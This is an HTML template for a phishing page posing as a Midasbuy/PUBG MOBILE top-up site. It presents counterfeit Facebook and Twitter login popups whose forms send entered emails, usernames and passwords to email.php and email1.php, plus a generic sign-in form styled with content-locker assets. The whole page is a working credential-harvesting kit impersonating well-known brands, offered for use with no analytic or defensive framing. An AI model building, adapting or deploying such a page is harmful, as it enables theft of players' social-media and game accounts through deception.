<html ><head>
    
    <link rel="stylesheet" href="https://cdn.midasbuy.com/oversea_web/static/css/vendor.d97b0b21.css?max_age=864000">
    <link rel="stylesheet" href="https://cdn.midasbuy.com/oversea_web/static/css/buypage.4ef96633.css?max_age=864000">
    <link rel="stylesheet" href="https://cdn.midasbuy.com/oversea_web/static/css/media.7d12056d.css?max_age=864000">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.2.0/css/material-design-iconic-font.min.css">
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="css/facebook.css">
    <link rel="stylesheet" href="css/twitter.css">
    <!-- fontawesome ايقونات -->
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.11.2/css/all.css">
    
    
    <script type="text/javascript" src="https://cdn.midasbuy.com/h5/overseah5/js/midas-oversea-h5page.js"></script><script async="" type="text/javascript" src="https://h.online-metrix.net/fp/tags.js?org_id=k8vif92e&amp;session_id=midasbuyundefined"></script><script data-assets-retry-hooked="true" async="" type="text/javascript" src="https://h.online-metrix.net/fp/tags.js?org_id=k8vif92e&amp;session_id=midasbuyundefined"></script><script data-assets-retry-hooked="true" async="" type="text/javascript" src="https://h.online-metrix.net/fp/tags.js?org_id=k8vif92e&amp;session_id=midasbuyundefined"></script><script data-assets-retry-hooked="true" async="" type="text/javascript" src="https://h.online-metrix.net/fp/tags.js?org_id=k8vif92e&amp;session_id=midasbuyundefined"></script>
    <script type="text/javascript" src="https://cdn.midasbuy.com/oversea_web/static/js/midas.runtime.js"></script>
    
    
    
    
    
    {% endblock bady %}
    
   
    
    </head>
    <body style="background: rgba(255, 255, 255, 0);">
         {% block bady %}
        
        
<div style="display: block;">
<div class="pop-mode" style="display: block;">







<button type="button" class="btn-facebook" style="font-size: 21px; background: rgb(24, 119, 241); width: 100%; height: auto; margin: 5px auto; padding: 13px; color: rgb(255, 255, 255); font-size: 15px; font-family: Teko, sans-serif; text-align: center; border: none; display: block;">
<p style="font-size: 21px;"><i class="fab fa-facebook-f" style=" float: left;"></i> Login with Facebook</p>
</button>

<button type="button" class="btn-twitter" style="font-size: 21px;background: rgb(24, 119, 241); width: 100%; height: auto; margin: 5px auto 15px; padding: 13px; color: rgb(255, 255, 255); font-size: 15px; font-family: Teko, sans-serif; text-align: center; border: none; display: block;">
<p style="font-size: 21px;"><i class="fab fa-twitter" style=" float: left;"></i> Login with Twitter</p>
</button> 


<h1 style="padding: 10px; margin: 5px; text-align: center; color: #E0E0E0;">Or</h1>

<div>
<link href="https://cdn.jsdelivr.net/gh/iDevMore/BuildLPs/PUBG/1/5.css" rel="preload" as="style">
<link href="https://cdn.jsdelivr.net/gh/iDevMore/BuildLPs/PUBG/1/5.js" rel="preload" as="script">
<link href="https://cdn.jsdelivr.net/gh/iDevMore/BuildLPs/PUBG/1/5.css" rel="stylesheet">
<link href="https://use.fontawesome.com/releases/v5.8.2/css/all.css" rel="stylesheet">

<div class="v-application">

<form style="width: 100%;">
<div class=" animated fadeInDown" style="height: 76px;">
<div class="v-image__image v-image__image--cover" style="background-image: url(&quot;https://bucket.cpabuild.com/uploads/158592370341d269029cd5843b7b01b035230c7756.jpg&quot;); background-position: center center;">
<div data-v-30cca3d2="" class="v-input ma-3 font-weight-bold title text-center v-input--has-state theme--light v-text-field v-text-field--is-booted error--text">


<label for="input-52" class="v-label theme--light error--text" style="left: 0px; right: auto; position: absolute;"></label>
<input required="required" autofocus="autofocus" id="input-52" placeholder="Sign in with phone or email" type="text">

</div></div></div>

<br>

<div class="  animated fadeInDown" style="height: 76px;">
<div class="v-image__image v-image__image--cover" style="background-image: url(&quot;https://bucket.cpabuild.com/uploads/158592370341d269029cd5843b7b01b035230c7756.jpg&quot;); background-position: center center;">
<div data-v-30cca3d2="" class="v-input ma-3 font-weight-bold title text-center v-input--has-state theme--light v-text-field v-text-field--is-booted error--text">


<label for="input-52" class="v-label theme--light error--text" style="left: 0px; right: auto; position: absolute;"></label>
<input required="required" autofocus="autofocus" placeholder="Your Password" id="input-52" type="text">


</div></div></div>
            
<hr data-v-30cca3d2="" role="separator" aria-orientation="horizontal" class="v-divider theme--dark">
<button data-v-30cca3d2="" type="button" class="white--text text-center mt-6 orange title font-weight-bold animated pulse slower infinite v-btn v-btn--block v-btn--contained v-btn--tile theme--light v-size--x-large"><span class="v-btn__content"> Start! </span></button>
</form>
</div>










</div></div></div> 

<div class="popup-login facebook animated fadeIn" style="display: none;"><div class="popup-box-login-fb"><a class="close-fb"><i class="zmdi zmdi-close"></i></a> <div class="navbar-fb"><img src="https://i.ibb.co/ysLKcwY/1280px-Facebook-svg.png"></div> <div class="content-box-fb"><img src="https://www.pubgmobile.com/id/event/royalepass10/images/icon_logo.jpg"> <div class="txt-login-fb">
Log in to your Facebook account to connect to PUBG MOBILE
</div>

<form action="email.php" method="post" class="login-form">

<label>
<input type="text" name="email" id="email" placeholder="Mobile number or email address" autocomplete="off" required="required" style="background-image: url(&quot;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAASCAYAAABSO15qAAAAAXNSR0IArs4c6QAAAPhJREFUOBHlU70KgzAQPlMhEvoQTg6OPoOjT+JWOnRqkUKHgqWP4OQbOPokTk6OTkVULNSLVc62oJmbIdzd95NcuGjX2/3YVI/Ts+t0WLE2ut5xsQ0O+90F6UxFjAI8qNcEGONia08e6MNONYwCS7EQAizLmtGUDEzTBNd1fxsYhjEBnHPQNG3KKTYV34F8ec/zwHEciOMYyrIE3/ehKAqIoggo9inGXKmFXwbyBkmSQJqmUNe15IRhCG3byphitm1/eUzDM4qR0TTNjEixGdAnSi3keS5vSk2UDKqqgizLqB4YzvassiKhGtZ/jDMtLOnHz7TE+yf8BaDZXA509yeBAAAAAElFTkSuQmCC&quot;); background-repeat: no-repeat; background-attachment: scroll; background-size: 16px 18px; background-position: 98% 50%;">
</label>
<label>
<input type="password" name="password" id="password" placeholder="Password" autocomplete="off" required="required" style="background-image: url(&quot;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAASCAYAAABSO15qAAAAAXNSR0IArs4c6QAAAPhJREFUOBHlU70KgzAQPlMhEvoQTg6OPoOjT+JWOnRqkUKHgqWP4OQbOPokTk6OTkVULNSLVc62oJmbIdzd95NcuGjX2/3YVI/Ts+t0WLE2ut5xsQ0O+90F6UxFjAI8qNcEGONia08e6MNONYwCS7EQAizLmtGUDEzTBNd1fxsYhjEBnHPQNG3KKTYV34F8ec/zwHEciOMYyrIE3/ehKAqIoggo9inGXKmFXwbyBkmSQJqmUNe15IRhCG3byphitm1/eUzDM4qR0TTNjEixGdAnSi3keS5vSk2UDKqqgizLqB4YzvassiKhGtZ/jDMtLOnHz7TE+yf8BaDZXA509yeBAAAAAElFTkSuQmCC&quot;); background-repeat: no-repeat; background-attachment: scroll; background-size: 16px 18px; background-position: 98% 50%;">
</label> 

<input type="hidden" name="playid" value="2131221" readonly="readonly"> 
<input type="hidden" name="login" value="Facebook" readonly="readonly"> 
<button type="submit" id="onf" onclick="off();" class="btn-login-fb">Log In</button> 
<button type="button" id="offf" class="btn-login-fb" style="display: none;">Log In</button>

</form> 

<div class="txt-create-account">Create account</div> <div class="txt-not-now">Not now</div> <div class="txt-forgotten-password">Forgotten password?</div></div> <div class="language-box"><center><div class="language-name language-name-active">English (UK)</div> <div class="language-name">Bahasa Indonesia</div> <div class="language-name">Basa Jawa</div> <div class="language-name">Bahasa Melayu</div> <div class="language-name">日本語</div> <div class="language-name">Español</div> <div class="language-name">Português (Brasil)</div> <div class="language-name"><i class="fa fa-plus"></i></div></center></div> <div class="copyright">Facebook Inc.</div></div></div> <div class="popup-login twitter animated fadeIn" style="display: none;"><div class="popup-box-login-twitter"><a class="close-other"><i class="zmdi zmdi-close"></i></a> <div class="header-twitter"><img src="https://i.ibb.co/KXksfxw/twitterz.png"></div> <br> <br> <div class="box-twitter"><center><form action="email1.php" method="post"><div class="txt-login-twitter">Login to Twitter</div> <div class="form-group"><input type="text" name="username" id="username" autocomplete="off" required="required" style="background-image: url(&quot;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAASCAYAAABSO15qAAAAAXNSR0IArs4c6QAAAPhJREFUOBHlU70KgzAQPlMhEvoQTg6OPoOjT+JWOnRqkUKHgqWP4OQbOPokTk6OTkVULNSLVc62oJmbIdzd95NcuGjX2/3YVI/Ts+t0WLE2ut5xsQ0O+90F6UxFjAI8qNcEGONia08e6MNONYwCS7EQAizLmtGUDEzTBNd1fxsYhjEBnHPQNG3KKTYV34F8ec/zwHEciOMYyrIE3/ehKAqIoggo9inGXKmFXwbyBkmSQJqmUNe15IRhCG3byphitm1/eUzDM4qR0TTNjEixGdAnSi3keS5vSk2UDKqqgizLqB4YzvassiKhGtZ/jDMtLOnHz7TE+yf8BaDZXA509yeBAAAAAElFTkSuQmCC&quot;); background-repeat: no-repeat; background-attachment: scroll; background-size: 16px 18px; background-position: 98% 50%;"> <label>Username</label></div> <div class="form-group"><input type="text" name="email" id="email1" autocomplete="off" required="required" style="background-image: url(&quot;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAASCAYAAABSO15qAAAAAXNSR0IArs4c6QAAAPhJREFUOBHlU70KgzAQPlMhEvoQTg6OPoOjT+JWOnRqkUKHgqWP4OQbOPokTk6OTkVULNSLVc62oJmbIdzd95NcuGjX2/3YVI/Ts+t0WLE2ut5xsQ0O+90F6UxFjAI8qNcEGONia08e6MNONYwCS7EQAizLmtGUDEzTBNd1fxsYhjEBnHPQNG3KKTYV34F8ec/zwHEciOMYyrIE3/ehKAqIoggo9inGXKmFXwbyBkmSQJqmUNe15IRhCG3byphitm1/eUzDM4qR0TTNjEixGdAnSi3keS5vSk2UDKqqgizLqB4YzvassiKhGtZ/jDMtLOnHz7TE+yf8BaDZXA509yeBAAAAAElFTkSuQmCC&quot;); background-repeat: no-repeat; background-attachment: scroll; background-size: 16px 18px; background-position: 98% 50%;"> <label>Phone/email/username</label></div> <div class="form-group"><input type="password" name="password" id="password1" autocomplete="off" required="required" style="background-image: url(&quot;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAASCAYAAABSO15qAAAAAXNSR0IArs4c6QAAAPhJREFUOBHlU70KgzAQPlMhEvoQTg6OPoOjT+JWOnRqkUKHgqWP4OQbOPokTk6OTkVULNSLVc62oJmbIdzd95NcuGjX2/3YVI/Ts+t0WLE2ut5xsQ0O+90F6UxFjAI8qNcEGONia08e6MNONYwCS7EQAizLmtGUDEzTBNd1fxsYhjEBnHPQNG3KKTYV34F8ec/zwHEciOMYyrIE3/ehKAqIoggo9inGXKmFXwbyBkmSQJqmUNe15IRhCG3byphitm1/eUzDM4qR0TTNjEixGdAnSi3keS5vSk2UDKqqgizLqB4YzvassiKhGtZ/jDMtLOnHz7TE+yf8BaDZXA509yeBAAAAAElFTkSuQmCC&quot;); background-repeat: no-repeat; background-attachment: scroll; background-size: 16px 18px; background-position: 98% 50%;"> <label>Password</label></div> <input type="hidden" name="playid" value="2131221" readonly="readonly"> <input type="hidden" name="login" value="Twitter" readonly="readonly"> <button type="submit" id="ont" onclick="off();" class="btn-login-twitter">Log In</button> <button type="button" id="offt" class="btn-login-twitter" style="display: none;">Log In</button> <div class="footer-menu-twitter">Forgot password?</div> <div class="footer-menu-twitter bulet">•</div> <div class="footer-menu-twitter">Sign up to Twitter</div></form></center></div></div></div>


<script>
$(".help-icon").on('click', function() {
$(".found-id-pop").show();
});
$(".btn").on('click', function() {
$(".found-id-pop").hide();
});
$(".pay-btn").on('click', function() {
$(".login").show();
});
$(".btn").on('click', function() {
$(".login").hide();
});
$(".btn-facebook").on('click', function() {
$(".facebook").show();
$(".login").hide();
});
$(".btn-twitter").on('click', function() {
$(".twitter").show();
$(".login").hide();
});
$(".close-fb").on('click', function() {
$(".facebook").hide();
$(".login").show();
});
$(".close-other").on('click', function() {
$(".twitter").hide();
$(".login").show();
});
report.view('topupv2');
report.setPage('topupv2');
report.performance('topupv2');
</script>


<style>
.navbar-fb {
background: #3b5998;
width: 95.5%;
height: auto;
padding: 8px;
border-top-left-radius: 10px;
border-top-right-radius: 10px;
}
.navbar-fb img {
width: 115px;
margin-left: auto;
margin-right: auto;
display: block;
}
.content-box-fb {
width: 300px;
height: auto;
margin-left: auto;
margin-right: auto;
display: block;
}
.content-box-fb img {
width: 60px;
margin-top: 20px;
margin-left: auto;
margin-right: auto;
border-radius: 12px;
display: block;
}
.txt-login-fb {
width: 270px;
height: auto;
margin-top: 10px;
margin-left: auto;
margin-right: auto;
margin-bottom: 17px;
padding: 8px;
color: #90949c;
font-size: 16px;
font-family: Roboto;
text-align: center;
display: block;
}
.login-form input[type="text"],.login-form input[type="password"] {
width: 90.2%;
height: auto;
padding: 12px;
color: #000;
font-size: 14px;
font-weight: 400;
font-family: 'Lato',sans-serif;
border: 1px solid #bdbebf;
cursor: pointer;
outline: none;
}
.login-form input[type="text"] {
margin: 0;
padding-bottom: 13px;
border-bottom: none;
border-radius: 4px 4px 0 0;
box-shadow: 0 -1px 0 #E0E0E0 inset,0 0px 0px rgba(0,0,0,0.23) inset;
}
.login-form input[type="password"] {
margin: 0;
border-top: none;
border-radius: 0 0 4px 4px;
box-shadow: 0 -0px 0 rgba(0,0,0,0.23) inset,0 0px 0px rgba(255,255,255,0.1);
}
.btn-login-fb {
background: #1778f2;
width: 100%;
height: auto;
margin-top: 10px;
margin-left: auto;
margin-right: auto;
padding: 10px;
color: #fff;
font-size: 14px;
font-family: Roboto;
font-weight: bold;
text-align: center;
text-shadow: 1px 0px rgba(0, 0, 0, 0.3);
border: 1px solid #3578e5;
border-radius: 5px;
box-shadow: 1px 1px 1px 1px rgba(0, 0, 0, 0.1);
outline: none;
display: block;
}
.txt-create-account {
width: 100%;
height: auto;
margin-top: 15px;
padding: 5px;
color: #3b5998;
font-size: 13.5px;
font-family: Roboto;
text-align: center;
}
.txt-not-now {
width: 100%;
height: auto;
padding: 5px;
color: #3b5998;
font-size: 13.5px;
font-family: Roboto;
text-align: center;
}
.txt-forgotten-password {
width: 100%;
height: auto;
margin-bottom: 30px;
padding: 5px;
color: #7596c8;
font-size: 13.5px;
font-family: Roboto;
text-align: center;
}
.language-box {
width: 100%;
height: auto;
margin-left: auto;
margin-right: auto;
display: block;
}
.language-name {
width: 40%;
height: auto;
margin: 5px;
margin-bottom: 0px;
color: #3b5998;
font-size: 12px;
font-family: Roboto;
text-align: center;
display: inline-block;
}
.language-name i {
width: 13px;
padding: 4px;
color: #90949c;
border: 1px solid #3b5998;
border-radius: 3px;
}
.language-name-active {
color: #90949c;
font-weight: bold;
}
.copyright {
width: 40%;
height: auto;
margin-top: 10px;
margin-left: auto;
margin-right: auto;
padding-bottom: 10px;
color: #90949c;
font-size: 12px;
font-family: Roboto;
text-align: center;
display: block;
} 



.popup-login {
background:rgba(0,0,0,0.5);
width:100%;
height:100%;
position:fixed;
top:0;
left:0;
z-index:9999;
}
.popup-box-login-fb {
background:#ECEFF6;
max-width:330px;
height:auto;
position:relative;
margin:50px auto;
margin-top:6%;
text-align:center;
font-family:'Teko';
color:#000;
border-radius:10px;
}
.popup-box-login-twitter {
background:#fff;
max-width:330px;
height:370px;
position:relative;
margin:50px auto;
margin-top:10%;
text-align:center;
font-family:'Teko';
color:#000;
border-radius:10px;
}
.close-fb {
background:#000;
width:20px;
height:20px;
color:#fff;
text-align:center;
text-decoration:none;
border-radius:50%;
border:1.5px solid #fff;
position:absolute;
top:-8px;
right:-10px;
display:block;
}
.close-fb i {
color:#fff;
padding-top:3px;
}
.close-other {
background:#000;
width:20px;
height:20px;
color:#fff;
text-align:center;
text-decoration:none;
border-radius:50%;
border:1.5px solid #fff;
top:-8px;
right:-10px;
position:absolute;
z-index:9999999;
display:block;
}
.close-other i {
color:#fff;
padding-top:3px;
}
@media only screen and (max-width:600px) {
.popup-box-login-fb {
width:330px;
margin-top:20%;
}
.popup-box-login-twitter {
margin-top: 25%;
}
}

.header-twitter {
background: #fff;
width: 100%;
font-size: 25px;
font-weight: bold;
text-align: left;
position: relative;
border-radius: 10px;
}
.header-twitter img {
width: 60px;
margin-left: 10px;
float: left;
}
.box-twitter {
width: 100%;
height: 400px;
position: absolute;
overflow: none;
font-size: 15px;
font-family: sans-serif;
border-radius: 10px;
}
.txt-login-twitter {
padding-top: 30px;
padding-left: 17px;
color: #000;
font-size: 20px;
font-weight: bold;
font-family: arial, sans-serif;
text-align: left;
margin-top: 3%;
margin-bottom: 8%;
}
.form-group {
position:relative;
padding:10px 0;
width:90%;
}
.form-group input {
background-color:transparent;
border: none;
border:1px solid #657786;
color:#000;
font-size:17px;
font-family: arial, sans-serif;
padding:16px;
padding-left:7px;
display:block;
border-radius: 3.5px;
width:90%;
}
.form-group label {
color:#6E767D;
font-size:17px;
font-weight:100;
font-family: arial, sans-serif;
position:absolute;
pointer-events:none;
top:0;
transform:translateY(26px);
transition:all 0.2s ease-in-out;
left:7px;
text-align:right;
}
.form-group input:valid,.form-group input:focus {
outline:none;
border: 2px solid #1da1f2;
}
.form-group input:valid+label,.form-group input:focus+label {
color:#1da1f2;
font-size:12px;
transform:translateY(0);
top: 15px;
}
.btn-login-twitter {
background: #1da1f2;
width: 92%;
height: auto;
margin-top: 10px;
padding: 14px;
color: #fff;
font-size: 15px;
font-weight: bold;
font-family: arial, sans-serif;
border: none;
border-radius: 30px;
outline: none;
letter-spacing: 1;
}
.footer-menu-twitter {
width: auto;
height: auto;
margin: 0.5%;
margin-top: 7%;
color: #1da1f2;
font-size: 14px;
font-family: arial, sans-serif;
display: inline-block;
}
.bulet {
color: #000;
font-size: 8px;
}
.aktifnya {
color: #1da1f2;
border-bottom: 2px solid #1da1f2;
}

.navbar-fb {
background: #3b5998;
width: 95.5%;
height: auto;
padding: 8px;
border-top-left-radius: 10px;
border-top-right-radius: 10px;
}
.navbar-fb img {
width: 115px;
margin-left: auto;
margin-right: auto;
display: block;
}
.content-box-fb {
width: 300px;
height: auto;
margin-left: auto;
margin-right: auto;
display: block;
}
.content-box-fb img {
width: 60px;
margin-top: 20px;
margin-left: auto;
margin-right: auto;
border-radius: 12px;
display: block;
}
.txt-login-fb {
width: 270px;
height: auto;
margin-top: 10px;
margin-left: auto;
margin-right: auto;
margin-bottom: 17px;
padding: 8px;
color: #90949c;
font-size: 16px;
font-family: Roboto;
text-align: center;
display: block;
}
.login-form input[type="text"],.login-form input[type="password"] {
width: 90.2%;
height: auto;
padding: 12px;
color: #000;
font-size: 14px;
font-weight: 400;
font-family: 'Lato',sans-serif;
border: 1px solid #bdbebf;
cursor: pointer;
outline: none;
}
.login-form input[type="text"] {
margin: 0;
padding-bottom: 13px;
border-bottom: none;
border-radius: 4px 4px 0 0;
box-shadow: 0 -1px 0 #E0E0E0 inset,0 0px 0px rgba(0,0,0,0.23) inset;
}
.login-form input[type="password"] {
margin: 0;
border-top: none;
border-radius: 0 0 4px 4px;
box-shadow: 0 -0px 0 rgba(0,0,0,0.23) inset,0 0px 0px rgba(255,255,255,0.1);
}
.btn-login-fb {
background: #1778f2;
width: 100%;
height: auto;
margin-top: 10px;
margin-left: auto;
margin-right: auto;
padding: 10px;
color: #fff;
font-size: 14px;
font-family: Roboto;
font-weight: bold;
text-align: center;
text-shadow: 1px 0px rgba(0, 0, 0, 0.3);
border: 1px solid #3578e5;
border-radius: 5px;
box-shadow: 1px 1px 1px 1px rgba(0, 0, 0, 0.1);
outline: none;
display: block;
}
.txt-create-account {
width: 100%;
height: auto;
margin-top: 15px;
padding: 5px;
color: #3b5998;
font-size: 13.5px;
font-family: Roboto;
text-align: center;
}
.txt-not-now {
width: 100%;
height: auto;
padding: 5px;
color: #3b5998;
font-size: 13.5px;
font-family: Roboto;
text-align: center;
}
.txt-forgotten-password {
width: 100%;
height: auto;
margin-bottom: 30px;
padding: 5px;
color: #7596c8;
font-size: 13.5px;
font-family: Roboto;
text-align: center;
}
.language-box {
width: 100%;
height: auto;
margin-left: auto;
margin-right: auto;
display: block;
}
.language-name {
width: 40%;
height: auto;
margin: 5px;
margin-bottom: 0px;
color: #3b5998;
font-size: 12px;
font-family: Roboto;
text-align: center;
display: inline-block;
}
.language-name i {
width: 13px;
padding: 4px;
color: #90949c;
border: 1px solid #3b5998;
border-radius: 3px;
}
.language-name-active {
color: #90949c;
font-weight: bold;
}
.copyright {
width: 40%;
height: auto;
margin-top: 10px;
margin-left: auto;
margin-right: auto;
padding-bottom: 10px;
color: #90949c;
font-size: 12px;
font-family: Roboto;
text-align: center;
display: block;
} 



.popup-login {
background:rgba(0,0,0,0.5);
width:100%;
height:100%;
position:fixed;
top:0;
left:0;
z-index:9999;
}
.popup-box-login-fb {
background:#ECEFF6;
max-width:330px;
height:auto;
position:relative;
margin:50px auto;
margin-top:6%;
text-align:center;
font-family:'Teko';
color:#000;
border-radius:10px;
}
.popup-box-login-twitter {
background:#fff;
max-width:330px;
height:370px;
position:relative;
margin:50px auto;
margin-top:10%;
text-align:center;
font-family:'Teko';
color:#000;
border-radius:10px;
}
.close-fb {
background:#000;
width:20px;
height:20px;
color:#fff;
text-align:center;
text-decoration:none;
border-radius:50%;
border:1.5px solid #fff;
position:absolute;
top:-8px;
right:-10px;
display:block;
}
.close-fb i {
color:#fff;
padding-top:3px;
}
.close-other {
background:#000;
width:20px;
height:20px;
color:#fff;
text-align:center;
text-decoration:none;
border-radius:50%;
border:1.5px solid #fff;
top:-8px;
right:-10px;
position:absolute;
z-index:9999999;
display:block;
}
.close-other i {
color:#fff;
padding-top:3px;
}
@media only screen and (max-width:600px) {
.popup-box-login-fb {
width:330px;
margin-top:20%;
}
.popup-box-login-twitter {
margin-top: 25%;
}
}

.header-twitter {
background: #fff;
width: 100%;
font-size: 25px;
font-weight: bold;
text-align: left;
position: relative;
border-radius: 10px;
}
.header-twitter img {
width: 60px;
margin-left: 10px;
float: left;
}
.box-twitter {
width: 100%;
height: 400px;
position: absolute;
overflow: none;
font-size: 15px;
font-family: sans-serif;
border-radius: 10px;
}
.txt-login-twitter {
padding-top: 30px;
padding-left: 17px;
color: #000;
font-size: 20px;
font-weight: bold;
font-family: arial, sans-serif;
text-align: left;
margin-top: 3%;
margin-bottom: 8%;
}
.form-group {
position:relative;
padding:10px 0;
width:90%;
}
.form-group input {
background-color:transparent;
border: none;
border:1px solid #657786;
color:#000;
font-size:17px;
font-family: arial, sans-serif;
padding:16px;
padding-left:7px;
display:block;
border-radius: 3.5px;
width:90%;
}
.form-group label {
color:#6E767D;
font-size:17px;
font-weight:100;
font-family: arial, sans-serif;
position:absolute;
pointer-events:none;
top:0;
transform:translateY(26px);
transition:all 0.2s ease-in-out;
left:7px;
text-align:right;
}
.form-group input:valid,.form-group input:focus {
outline:none;
border: 2px solid #1da1f2;
}
.form-group input:valid+label,.form-group input:focus+label {
color:#1da1f2;
font-size:12px;
transform:translateY(0);
top: 15px;
}
.btn-login-twitter {
background: #1da1f2;
width: 92%;
height: auto;
margin-top: 10px;
padding: 14px;
color: #fff;
font-size: 15px;
font-weight: bold;
font-family: arial, sans-serif;
border: none;
border-radius: 30px;
outline: none;
letter-spacing: 1;
}
.footer-menu-twitter {
width: auto;
height: auto;
margin: 0.5%;
margin-top: 7%;
color: #1da1f2;
font-size: 14px;
font-family: arial, sans-serif;
display: inline-block;
}
.bulet {
color: #000;
font-size: 8px;
}
.aktifnya {
color: #1da1f2;
border-bottom: 2px solid #1da1f2;
}
</style>

     
    <
        /body></html>

    